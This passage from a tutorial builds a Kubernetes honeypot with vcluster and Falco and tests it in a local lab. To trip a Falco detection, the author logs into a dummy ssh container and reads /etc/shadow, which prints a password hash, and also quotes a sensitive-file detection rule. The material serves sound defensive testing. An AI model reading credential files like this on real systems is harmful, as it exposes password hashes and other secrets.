kube-system   pod/kube-apiserver-minikube                         1/1     Running   0          4m
kube-system   pod/kube-controller-manager-minikube                1/1     Running   0          4m
kube-system   pod/kube-proxy-dhg9v                                1/1     Running   0          4m
kube-system   pod/kube-scheduler-minikube                         1/1     Running   0          4m
kube-system   pod/storage-provisioner                             1/1     Running   0          4m
vcluster      pod/coredns-6ffcc6b58-h7zwx-x-kube-system-x-ssh    1/1     Running   0          1m
vcluster      pod/my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh   1/1     Running   0          5m
vcluster      pod/ssh-0                                           2/2     Running   0          1m
NAMESPACE     NAME                                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
default       service/kubernetes                     ClusterIP   10.96.0.1       <none>        443/TCP                  4m
kube-system   service/kube-dns                       ClusterIP   10.96.0.10      <none>        53/UDP,53/TCP,9153/TCP   4m
vcluster      service/kube-dns-x-kube-system-x-ssh   ClusterIP   10.97.196.120   <none>        53/UDP,53/TCP,9153/TCP   1m
vcluster      service/my-dummy-ssh-x-default-x-ssh   ClusterIP   10.99.109.0     <none>        22/TCP                   5m
vcluster      service/ssh                            NodePort    10.96.112.178   <none>        443:31530/TCP            1m
vcluster      service/ssh-headless                   ClusterIP   None            <none>        443/TCP                  1m
vcluster      service/ssh-node-minikube              ClusterIP   10.102.36.118   <none>        10250/TCP                1m
NAMESPACE     NAME                        DESIRED   CURRENT   READY   UP-TO-DATE   AVAILABLE   NODE SELECTOR            AGE
falco         daemonset.apps/falco        1         1         1       1            1           <none>                   5m
kube-system   daemonset.apps/kube-proxy   1         1         1       1            1           kubernetes.io/os=linux   4m
NAMESPACE     NAME                      READY   UP-TO-DATE   AVAILABLE   AGE
kube-system   deployment.apps/coredns   1/1     1            1           4m
NAMESPACE     NAME                                 DESIRED   CURRENT   READY   AGE
kube-system   replicaset.apps/coredns-d4b75cb6d   1         1         1       4m
NAMESPACE   NAME                   READY   AGE
vcluster    statefulset.apps/ssh   1/1     1m

Now we can see the resources for Falco, as well as the synced resources from our ssh install. This time, they appear in the vcluster namespace we created on the host cluster. Note the naming convention: the vcluster syncer renames each synced resource to <name>-x-<original namespace>-x-<vcluster name>, which is why our pod shows up here as my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh.
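Since everything synced out of the virtual cluster carries that -x- naming pattern, a quick way to see only the honeypot's workloads from the host side is to filter for it. This is just a convenience sketch using grep, not anything vcluster-specific:

$ kubectl get pods -n vcluster | grep -e '-x-'

This should return the synced coredns and my-dummy-ssh pods, while leaving out the ssh-0 pod that runs the virtual control plane itself.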

Testing out our honeypot

Great, we have everything assembled now. Let’s do something to trip a Falco rule in our honeypot target and see how everything works so far.

The most convenient way to simulate a real intrusion is to use three different terminal windows.

Terminal 1

In terminal 1, we’ll set up a port forward in order to expose our ssh server to the local machine. This terminal needs to stay open while we test in order to expose the ssh service.

kubectl port-forward svc/my-dummy-ssh 5555:22

This command will expose the service on 127.0.0.1, port 5555. We need to make sure that we are running in the vcluster context for this window. If we are in the host cluster context, we can switch back by running the command vcluster connect ssh -n vcluster.

$ kubectl port-forward svc/my-dummy-ssh 5555:22
Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22
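Before moving on to the next terminal, it can be worth confirming that the tunnel actually reaches an ssh server. One quick, assumption-light way is ssh-keyscan, which ships with OpenSSH and simply asks the far end for its host key:

$ ssh-keyscan -p 5555 127.0.0.1

If the forward is healthy, this prints one or more host key lines; if it hangs or errors out, check that the port-forward terminal is still running and still in the vcluster context.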

Terminal 2

In this terminal, we will ssh into the service that we just exposed on port 5555. The credentials are root/THEPASSWORDYOUCREATED.

$ ssh -p 5555 root@127.0.0.1
The authenticity of host '[127.0.0.1]:5555 ([127.0.0.1]:5555)' can't be established.
ED25519 key fingerprint is SHA256:eLwgzyjvrpwDbDr+pDbIfUhlNANB4DPH9/0w1vGa87E.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:5555' (ED25519) to the list of known hosts.
root@127.0.0.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.10.57 x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Once we have logged in over ssh, we want to do something to trip a Falco rule. For example, viewing /etc/shadow should get us a hit.

root@my-dummy-ssh-7f98c68f95-5vwns:~# cat /etc/shadow
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
<snip>
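Reading /etc/shadow is just one convenient tripwire. If we want to see a few more detections fire, the commands below typically match other rules in the default Falco ruleset; the exact rule names and conditions vary between Falco versions, so treat these as suggestions rather than guarantees:

# Typically matches a "write below /etc"-style rule
touch /etc/this-should-not-be-here

# Typically matches a rule about package managers running in containers
apt-get update

Either of these should produce additional entries in the Falco logs we are about to look at.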

Terminal 3

In this terminal, we will view the logs from the Falco pod. Note that the random suffix in the pod name will differ for every install, so substitute the name from your own kubectl get all output.

$ kubectl logs falco-zwfcj -n falco
23:22:26.726981623: Notice Redirect stdout/stdin to network connection (user=root user_loginuid=-1 k8s.ns=vcluster k8s.pod=my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh container=cffc68f50e06 process=sshd parent=sshd cmdline=sshd -D terminal=0 container_id=cffc68f50e06 image=securecodebox/dummy-ssh fd.name=172.17.0.1:40312->172.17.0.6:22 fd.num=1 fd.type=ipv4 fd.sip=172.17.0.6)
23:22:27.709831799: Warning Sensitive file opened for reading by non-trusted program (user=root user_loginuid=0 program=cat command=cat /etc/shadow file=/etc/shadow parent=bash gparent=sshd ggparent=sshd gggparent=<NA> container_id=cffc68f50e06 image=securecodebox/dummy-ssh) k8s.ns=vcluster k8s.pod=my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh container=cffc68f50e06

Here, we will see many entries for the Notice Redirect stdout/stdin to network connection rule as a result of our port forwarding, but we should also see the Warning Sensitive file opened for reading by non-trusted program rule fire as a result of taking a peek at /etc/shadow.
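For the curious, the detection that caught us is a stock rule, not something we wrote. Below is a heavily abbreviated and lightly paraphrased sketch of what it looks like in falco_rules.yaml; the real definition carries a long list of exclusions for trusted programs, so consult the ruleset shipped with your Falco version for the authoritative text:

- rule: Read sensitive file untrusted
  desc: An attempt to read any sensitive file (e.g., files containing user/password/authentication information)
  condition: sensitive_files and open_read and proc_name_exists and ...   # long list of exclusions omitted
  output: >
    Sensitive file opened for reading by non-trusted program
    (user=%user.name program=%proc.name command=%proc.cmdline file=%fd.name ...)
  priority: WARNING

That WARNING priority is what shows up as the Warning prefix in the log line above.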

Image: Falco detects activity inside the container, inside the honeypot.

Voila! This is Falco catching us mucking about with things that we should not be: over an ssh connection, against a target running inside our vcluster, which itself runs inside the host cluster.

Burn it all down

If we want to clean up the mess we’ve made, or if things go sideways enough for us to want to start over, we can clean everything out with a few simple commands: uninstall Falco and our ssh server, clean out minikube, and tidy a few temp files we might trip over later.

$ helm delete falco --namespace falco; helm delete my-dummy-ssh --namespace default; minikube delete --all --purge; sudo rm /tmp/juju*
release "falco" uninstalled
release "my-dummy-ssh" uninstalled
🔥  Deleting "minikube" in virtualbox ...
💀  Removed all traces of the "minikube" cluster.
🔥  Successfully deleted all profiles
[sudo] password for user:
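If we want to double-check that the teardown actually took, a couple of quick queries should come back empty, or at least free of anything honeypot-related:

$ helm list --all-namespaces
$ minikube profile list

With that, we are back to a clean slate.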

But wait, there’s more!

Virtual clusters show a great deal of promise for use in honeypots and for security research in general. This is sure to be an exciting field to watch, both in terms of future developments and how the technology industry puts these tools to use.

What we built here is a good start, but there are quite a few more interesting things we can do to polish and enhance.

Ready for more? Check out the next in the series, Building Honeypots with vcluster and Falco: Episode II, where we leverage Falcosidekick and other assorted open source tools.
